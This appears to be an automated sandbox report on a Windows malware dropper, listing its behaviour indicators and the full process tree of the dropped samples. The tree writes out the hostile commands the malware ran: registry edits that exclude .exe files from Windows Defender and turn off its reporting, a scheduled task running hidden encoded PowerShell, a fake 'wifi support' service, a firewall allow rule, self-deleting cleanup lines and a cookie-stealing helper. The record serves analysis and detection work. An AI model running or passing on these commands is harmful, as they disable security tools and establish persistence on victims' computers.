905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	sotema_3.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

sotema_2.exejfiag3g_gg.exe

pid	process
1536	sotema_2.exe
1536	sotema_2.exe
3076	jfiag3g_gg.exe
3076	jfiag3g_gg.exe
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

2996
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

sotema_2.exe

pid process

1536 sotema_2.exe

pid	process
2996

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

sotema_6.exesotema_8.exee9w9qlGQglAXeOn4N6D4RkOA.exeeBakVWk94D0wUhfTMfF9Dc0S.exeCk2q4uT6iTaIEd0lvKzbHduR.exeZtXUyQgiFjQYVDgjY29raqAb.exesotema_9.exe

description	pid	process
Token: SeDebugPrivilege	1848	sotema_6.exe
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeDebugPrivilege	1200	sotema_8.exe
Token: SeDebugPrivilege	4968	e9w9qlGQglAXeOn4N6D4RkOA.exe
Token: SeDebugPrivilege	1532	eBakVWk94D0wUhfTMfF9Dc0S.exe
Token: SeDebugPrivilege	860	Ck2q4uT6iTaIEd0lvKzbHduR.exe
Token: SeDebugPrivilege	1924	ZtXUyQgiFjQYVDgjY29raqAb.exe
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeDebugPrivilege	3836	sotema_9.exe
Token: SeShutdownPrivilege	2996

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

c8b0a49e4c8aae835e2d77c0501f50e100d768c4b0bb0b97fb52643f9d6d50c8.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exesotema_4.exesotema_5.exe

description	pid	process	target process
PID 4668 wrote to memory of 2288	4668	c8b0a49e4c8aae835e2d77c0501f50e100d768c4b0bb0b97fb52643f9d6d50c8.exe	setup_installer.exe
PID 4668 wrote to memory of 2288	4668	c8b0a49e4c8aae835e2d77c0501f50e100d768c4b0bb0b97fb52643f9d6d50c8.exe	setup_installer.exe
PID 4668 wrote to memory of 2288	4668	c8b0a49e4c8aae835e2d77c0501f50e100d768c4b0bb0b97fb52643f9d6d50c8.exe	setup_installer.exe
PID 2288 wrote to memory of 3044	2288	setup_installer.exe	setup_install.exe
PID 2288 wrote to memory of 3044	2288	setup_installer.exe	setup_install.exe
PID 2288 wrote to memory of 3044	2288	setup_installer.exe	setup_install.exe
PID 3044 wrote to memory of 1008	3044	setup_install.exe	cmd.exe
PID 3044 wrote to memory of 1008	3044	setup_install.exe	cmd.exe
PID 3044 wrote to memory of 1008	3044	setup_install.exe	cmd.exe
PID 3044 wrote to memory of 4044	3044	setup_install.exe	cmd.exe
PID 3044 wrote to memory of 4044	3044	setup_install.exe	cmd.exe
PID 3044 wrote to memory of 4044	3044	setup_install.exe	cmd.exe
PID 3044 wrote to memory of 2728	3044	setup_install.exe	cmd.exe
PID 3044 wrote to memory of 2728	3044	setup_install.exe	cmd.exe
PID 3044 wrote to memory of 2728	3044	setup_install.exe	cmd.exe
PID 3044 wrote to memory of 392	3044	setup_install.exe	cmd.exe
PID 3044 wrote to memory of 392	3044	setup_install.exe	cmd.exe
PID 3044 wrote to memory of 392	3044	setup_install.exe	cmd.exe
PID 3044 wrote to memory of 2408	3044	setup_install.exe	cmd.exe
PID 3044 wrote to memory of 2408	3044	setup_install.exe	cmd.exe
PID 3044 wrote to memory of 2408	3044	setup_install.exe	cmd.exe
PID 3044 wrote to memory of 4724	3044	setup_install.exe	cmd.exe
PID 3044 wrote to memory of 4724	3044	setup_install.exe	cmd.exe
PID 3044 wrote to memory of 4724	3044	setup_install.exe	cmd.exe
PID 3044 wrote to memory of 2224	3044	setup_install.exe	cmd.exe
PID 3044 wrote to memory of 2224	3044	setup_install.exe	cmd.exe
PID 3044 wrote to memory of 2224	3044	setup_install.exe	cmd.exe
PID 3044 wrote to memory of 4748	3044	setup_install.exe	cmd.exe
PID 3044 wrote to memory of 4748	3044	setup_install.exe	cmd.exe
PID 3044 wrote to memory of 4748	3044	setup_install.exe	cmd.exe
PID 3044 wrote to memory of 3588	3044	setup_install.exe	cmd.exe
PID 3044 wrote to memory of 3588	3044	setup_install.exe	cmd.exe
PID 3044 wrote to memory of 3588	3044	setup_install.exe	cmd.exe
PID 4044 wrote to memory of 1536	4044	cmd.exe	sotema_2.exe
PID 4044 wrote to memory of 1536	4044	cmd.exe	sotema_2.exe
PID 4044 wrote to memory of 1536	4044	cmd.exe	sotema_2.exe
PID 392 wrote to memory of 2316	392	cmd.exe	sotema_4.exe
PID 392 wrote to memory of 2316	392	cmd.exe	sotema_4.exe
PID 392 wrote to memory of 2316	392	cmd.exe	sotema_4.exe
PID 1008 wrote to memory of 4188	1008	cmd.exe	sotema_1.exe
PID 1008 wrote to memory of 4188	1008	cmd.exe	sotema_1.exe
PID 1008 wrote to memory of 4188	1008	cmd.exe	sotema_1.exe
PID 2728 wrote to memory of 4232	2728	cmd.exe	sotema_3.exe
PID 2728 wrote to memory of 4232	2728	cmd.exe	sotema_3.exe
PID 2728 wrote to memory of 4232	2728	cmd.exe	sotema_3.exe
PID 3588 wrote to memory of 3836	3588	cmd.exe	sotema_9.exe
PID 3588 wrote to memory of 3836	3588	cmd.exe	sotema_9.exe
PID 3588 wrote to memory of 3836	3588	cmd.exe	sotema_9.exe
PID 4748 wrote to memory of 1200	4748	cmd.exe	sotema_8.exe
PID 4748 wrote to memory of 1200	4748	cmd.exe	sotema_8.exe
PID 4748 wrote to memory of 1200	4748	cmd.exe	sotema_8.exe
PID 4724 wrote to memory of 1848	4724	cmd.exe	sotema_6.exe
PID 4724 wrote to memory of 1848	4724	cmd.exe	sotema_6.exe
PID 2408 wrote to memory of 632	2408	cmd.exe	sotema_5.exe
PID 2408 wrote to memory of 632	2408	cmd.exe	sotema_5.exe
PID 2408 wrote to memory of 632	2408	cmd.exe	sotema_5.exe
PID 2224 wrote to memory of 1148	2224	cmd.exe	sotema_7.exe
PID 2224 wrote to memory of 1148	2224	cmd.exe	sotema_7.exe
PID 2224 wrote to memory of 1148	2224	cmd.exe	sotema_7.exe
PID 2316 wrote to memory of 2608	2316	sotema_4.exe	jfiag3g_gg.exe
PID 2316 wrote to memory of 2608	2316	sotema_4.exe	jfiag3g_gg.exe
PID 2316 wrote to memory of 2608	2316	sotema_4.exe	jfiag3g_gg.exe
PID 632 wrote to memory of 3944	632	sotema_5.exe	sotema_5.tmp
PID 632 wrote to memory of 3944	632	sotema_5.exe	sotema_5.tmp

C:\Users\Admin\AppData\Local\Temp\c8b0a49e4c8aae835e2d77c0501f50e100d768c4b0bb0b97fb52643f9d6d50c8.exe
"C:\Users\Admin\AppData\Local\Temp\c8b0a49e4c8aae835e2d77c0501f50e100d768c4b0bb0b97fb52643f9d6d50c8.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4668

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2288

C:\Users\Admin\AppData\Local\Temp\7zS0F88853E\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0F88853E\setup_install.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3044

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_9.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:3588

C:\Users\Admin\AppData\Local\Temp\7zS0F88853E\sotema_9.exe
sotema_9.exe
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3836

C:\Users\Admin\AppData\Local\Temp\7zS0F88853E\sotema_9.exe
C:\Users\Admin\AppData\Local\Temp\7zS0F88853E\sotema_9.exe
6⤵
- Executes dropped EXE
PID:3684

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_8.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4748

C:\Users\Admin\AppData\Local\Temp\7zS0F88853E\sotema_8.exe
sotema_8.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1200

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_7.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2224

C:\Users\Admin\AppData\Local\Temp\7zS0F88853E\sotema_7.exe
sotema_7.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:1148

C:\Users\Admin\Documents\eBakVWk94D0wUhfTMfF9Dc0S.exe
"C:\Users\Admin\Documents\eBakVWk94D0wUhfTMfF9Dc0S.exe"
6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1532

C:\Users\Admin\Documents\9zp6bm2YJTlbj13a6HIkNrGc.exe
"C:\Users\Admin\Documents\9zp6bm2YJTlbj13a6HIkNrGc.exe"
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:4844

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
7⤵
PID:1760

C:\Users\Admin\Documents\Tp76K8lXJutNDPU3GBzruQ17.exe
"C:\Users\Admin\Documents\Tp76K8lXJutNDPU3GBzruQ17.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
PID:4152

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Tp76K8lXJutNDPU3GBzruQ17.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\Tp76K8lXJutNDPU3GBzruQ17.exe" & del C:\ProgramData\*.dll & exit
7⤵
PID:2408

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Tp76K8lXJutNDPU3GBzruQ17.exe /f
8⤵
- Kills process with taskkill
PID:1564

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of SetThreadContext
- Delays execution with timeout.exe
PID:4132

C:\Users\Admin\Documents\aPxXMysp9421peTm33S09UhF.exe
"C:\Users\Admin\Documents\aPxXMysp9421peTm33S09UhF.exe"
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:100

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
7⤵
PID:3672

C:\Users\Admin\Documents\ObNPpajSdivDVdGGrUbrToAT.exe
"C:\Users\Admin\Documents\ObNPpajSdivDVdGGrUbrToAT.exe"
6⤵
- Executes dropped EXE
PID:2960

C:\Users\Admin\AppData\Local\Temp\7zSD1EF.tmp\Install.exe
.\Install.exe
7⤵
- Executes dropped EXE
PID:2432

C:\Users\Admin\AppData\Local\Temp\7zSE567.tmp\Install.exe
.\Install.exe /S /site_id "525403"
8⤵
- Executes dropped EXE
PID:3692

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
9⤵
PID:2380

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
10⤵
PID:5088

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
11⤵
PID:3856

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
11⤵
PID:2324

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
9⤵
PID:4272

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
10⤵
PID:1524

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
11⤵
PID:1356

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
11⤵
PID:5116

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gnFefsZjv" /SC once /ST 00:24:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
9⤵
- Creates scheduled task(s)
PID:1340

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gnFefsZjv"
9⤵
PID:1408

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gnFefsZjv"
9⤵
PID:5108

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 00:41:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\ZlCfslO.exe\" j6 /site_id 525403 /S" /V1 /F
9⤵
- Creates scheduled task(s)
PID:4432

C:\Users\Admin\Documents\ZtXUyQgiFjQYVDgjY29raqAb.exe
"C:\Users\Admin\Documents\ZtXUyQgiFjQYVDgjY29raqAb.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
PID:1924

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout 45
7⤵
PID:3748

C:\Windows\SysWOW64\timeout.exe
timeout 45
8⤵
- Delays execution with timeout.exe
PID:3680

C:\Users\Admin\Documents\a4h4FifFWWhR3hoFoyrXlTxe.exe
"C:\Users\Admin\Documents\a4h4FifFWWhR3hoFoyrXlTxe.exe"
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:2436

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
7⤵
PID:3996

C:\Users\Admin\Documents\t8ZTXQMknI0Bf_T6U2r9mI9y.exe
"C:\Users\Admin\Documents\t8ZTXQMknI0Bf_T6U2r9mI9y.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
PID:2236

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ebjlakav\
7⤵
PID:3568

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\xwqllzmt.exe" C:\Windows\SysWOW64\ebjlakav\
7⤵
PID:3964

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create ebjlakav binPath= "C:\Windows\SysWOW64\ebjlakav\xwqllzmt.exe /d\"C:\Users\Admin\Documents\t8ZTXQMknI0Bf_T6U2r9mI9y.exe\"" type= own start= auto DisplayName= "wifi support"
7⤵
PID:4644

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description ebjlakav "wifi internet conection"
7⤵
PID:2552

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start ebjlakav
7⤵
PID:4452

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
7⤵
PID:3180

C:\Users\Admin\hmhgeiaz.exe
"C:\Users\Admin\hmhgeiaz.exe" /d"C:\Users\Admin\Documents\t8ZTXQMknI0Bf_T6U2r9mI9y.exe"
7⤵
- Executes dropped EXE
- Checks computer location settings
PID:4232

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\uhzvhad.exe" C:\Windows\SysWOW64\ebjlakav\
8⤵
PID:3568

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" config ebjlakav binPath= "C:\Windows\SysWOW64\ebjlakav\uhzvhad.exe /d\"C:\Users\Admin\hmhgeiaz.exe\""
8⤵
PID:1160

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start ebjlakav
8⤵
PID:1008

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1255.bat" "
8⤵
PID:4764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4232 -s 1044
8⤵
- Program crash
PID:2380

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
8⤵
PID:4604

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2236 -s 1184
7⤵
- Program crash
PID:2496

C:\Users\Admin\Documents\a9OaEpv23FYgJFvbYtMQLkRf.exe
"C:\Users\Admin\Documents\a9OaEpv23FYgJFvbYtMQLkRf.exe"
6⤵
- Executes dropped EXE
PID:4140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\a9OaEpv23FYgJFvbYtMQLkRf.exe
7⤵
PID:2032

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 0
8⤵
PID:632

C:\Users\Admin\Documents\gk1Wob6J3yJXx6KlooXtIyoO.exe
"C:\Users\Admin\Documents\gk1Wob6J3yJXx6KlooXtIyoO.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:2656

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im gk1Wob6J3yJXx6KlooXtIyoO.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\gk1Wob6J3yJXx6KlooXtIyoO.exe" & del C:\ProgramData\*.dll & exit
7⤵
PID:1184

C:\Windows\SysWOW64\taskkill.exe
taskkill /im gk1Wob6J3yJXx6KlooXtIyoO.exe /f
8⤵
- Kills process with taskkill
PID:4044

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
8⤵
- Delays execution with timeout.exe
PID:4560

C:\Users\Admin\Documents\e9w9qlGQglAXeOn4N6D4RkOA.exe
"C:\Users\Admin\Documents\e9w9qlGQglAXeOn4N6D4RkOA.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
PID:4968

C:\Users\Admin\Documents\Ck2q4uT6iTaIEd0lvKzbHduR.exe
"C:\Users\Admin\Documents\Ck2q4uT6iTaIEd0lvKzbHduR.exe"
6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:860

C:\Users\Admin\Documents\H0xRUQKkmCQXV25wXqbpEIcg.exe
"C:\Users\Admin\Documents\H0xRUQKkmCQXV25wXqbpEIcg.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1952

C:\Users\Admin\Documents\AyL1Nf0UDBpFR_JQ8iZsmZkK.exe
"C:\Users\Admin\Documents\AyL1Nf0UDBpFR_JQ8iZsmZkK.exe"
6⤵
- Executes dropped EXE
PID:960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 960 -s 632
7⤵
- Program crash
PID:3816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 960 -s 660
7⤵
- Program crash
PID:4248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 960 -s 736
7⤵
- Program crash
PID:3308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 960 -s 1264
7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of SetThreadContext
- Program crash
PID:4744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 960 -s 1272
7⤵
- Program crash
PID:1472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 960 -s 1304
7⤵
- Program crash
PID:3168

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "AyL1Nf0UDBpFR_JQ8iZsmZkK.exe" /f & erase "C:\Users\Admin\Documents\AyL1Nf0UDBpFR_JQ8iZsmZkK.exe" & exit
7⤵
PID:1820

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "AyL1Nf0UDBpFR_JQ8iZsmZkK.exe" /f
8⤵
- Kills process with taskkill
PID:3168

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 960 -s 1104
7⤵
- Program crash
PID:5064

C:\Users\Admin\Documents\NNiu__cHUStP7cRauwqxtlal.exe
"C:\Users\Admin\Documents\NNiu__cHUStP7cRauwqxtlal.exe"
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:4244

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
7⤵
PID:2036

C:\Users\Admin\Documents\3dOE3d1sZf_nJ1ibs4cw_woX.exe
"C:\Users\Admin\Documents\3dOE3d1sZf_nJ1ibs4cw_woX.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:3428

C:\Users\Admin\Documents\kVVfY9rHG8TllcLpgyZTw_MF.exe
"C:\Users\Admin\Documents\kVVfY9rHG8TllcLpgyZTw_MF.exe"
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:1412

C:\Users\Admin\Documents\GMWfiCB7tB8bpQOnPfqVUmFQ.exe
"C:\Users\Admin\Documents\GMWfiCB7tB8bpQOnPfqVUmFQ.exe"
6⤵
- Executes dropped EXE
PID:4252

C:\Users\Admin\Documents\83jVo6uZCosswstsHc6cG3zt.exe
"C:\Users\Admin\Documents\83jVo6uZCosswstsHc6cG3zt.exe"
6⤵
PID:4132

C:\Users\Admin\Documents\0SVJIsZHHUtmeh0VAbR3H1US.exe
"C:\Users\Admin\Documents\0SVJIsZHHUtmeh0VAbR3H1US.exe"
6⤵
PID:4744

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_6.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4724

C:\Users\Admin\AppData\Local\Temp\7zS0F88853E\sotema_6.exe
sotema_6.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1848

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_5.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2408

C:\Users\Admin\AppData\Local\Temp\7zS0F88853E\sotema_5.exe
sotema_5.exe
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:632

C:\Users\Admin\AppData\Local\Temp\is-ITAU7.tmp\sotema_5.tmp
"C:\Users\Admin\AppData\Local\Temp\is-ITAU7.tmp\sotema_5.tmp" /SL5="$8015E,506127,422400,C:\Users\Admin\AppData\Local\Temp\7zS0F88853E\sotema_5.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3944

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_4.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:392

C:\Users\Admin\AppData\Local\Temp\7zS0F88853E\sotema_4.exe
sotema_4.exe
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2316

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
6⤵
- Executes dropped EXE
PID:2608

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3076

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_3.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2728

C:\Users\Admin\AppData\Local\Temp\7zS0F88853E\sotema_3.exe
sotema_3.exe
5⤵
- Executes dropped EXE
- Modifies system certificate store
PID:4232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4232 -s 932
6⤵
- Program crash
PID:4060

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_2.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4044

C:\Users\Admin\AppData\Local\Temp\7zS0F88853E\sotema_2.exe
sotema_2.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1536

C:\Windows\SysWOW64\cmd.exe
